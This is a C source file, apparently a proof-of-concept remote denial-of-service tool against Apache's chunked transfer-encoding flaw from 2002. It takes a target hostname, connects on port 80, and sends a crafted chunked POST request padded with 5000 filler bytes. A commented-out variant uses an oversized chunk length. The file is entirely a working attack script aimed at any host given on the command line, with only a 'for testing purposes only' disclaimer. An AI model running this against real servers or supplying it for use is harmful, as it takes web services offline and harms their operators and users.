/*
 * Apache remote DoS (1.3.x/2.0.x branches) based on the recent flaw met in chunked encoding.  
 * Please read http://httpd.apache.org/info/security_bulletin_20020620.txt
 *
 *
 * Proof of concept code. For testing purposes only.
 *
 * By bob. [www.dtors.net]
 */


#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>




int main(int argc, char *argv[]) {
int sock, i;
char chunk[6000], buf[5000];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
 

fprintf(stdout, "\nApache-Chunk.c By bob. [www.dtors.net]\n"); 
if(argc<2) 
  {
   fprintf(stderr, "\nUsage : %s <host>\n\n", argv[0]);
   exit(1);
  } 

fprintf(stdout, "\n---[+] Looking up host : %s.....\n", argv[1]); 

if ((he=gethostbyname(argv[1])) == NULL)
   {
   fprintf(stderr, "---[-] Hostname lookup failed!\n\n");
   exit(1);
   }

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

fprintf(stdout, "---[+] Connecting... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     fprintf(stderr, "---[-] Connection Timed Out!\n");
     exit(1);
     }

else {
sleep(5);
memset(buf,0x41,5000);
fprintf(stdout, "---[+] Sending... \n");
//sprintf(chunk, "POST /xxx.htm HTTP/1.1\nHost: %s\nTransfer-Encoding: chunked\n\n90000000\t\t", argv[1]);
sprintf(chunk, "POST /index.html HTTP/1.1\r\nAccept: */*\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n %s",argv[1],buf);    
     

write(sock,chunk,strlen(chunk));
     write(sock,"\n\n",2);
     


fprintf(stdout, "---[+] Sent! \n\n");
close(sock);

}
}